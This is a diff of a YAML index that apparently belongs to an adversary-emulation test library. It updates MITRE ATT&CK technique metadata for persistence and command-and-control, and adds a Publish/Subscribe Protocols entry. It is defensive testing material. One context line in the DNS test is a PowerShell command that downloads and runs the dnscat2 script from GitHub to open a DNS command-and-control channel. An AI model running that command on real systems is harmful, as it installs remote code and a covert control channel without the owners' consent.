-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -61109,20 +61504,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -61152,7 +61584,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -61176,12 +61608,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -61265,11 +61695,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -61321,9 +61750,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -61450,7 +61878,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -61488,8 +61916,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -61625,7 +62051,7 @@ persistence:
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -61688,7 +62114,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -61746,7 +62171,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests:
     - name: XOR Encoded data.
@@ -61783,92 +62207,91 @@ command-and-control:
         name: powershell
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -61934,7 +62357,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests:
     - name: DNS Large Query Volume
@@ -62061,6 +62483,65 @@ command-and-control:
           IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
           Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
         name: powershell
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -62106,7 +62587,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -62138,7 +62618,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -62160,22 +62640,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -62197,7 +62675,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -62222,7 +62700,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests:
     - name: Telnet C2
@@ -62344,7 +62821,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests:
     - name: TeamViewer Files Detected Test on Windows
@@ -62798,11 +63274,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -62886,7 +63361,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -62917,7 +63391,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -62937,8 +63411,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -62960,8 +63434,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests:
     - name: DNS over HTTPS Large Query Volume
@@ -63175,7 +63647,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
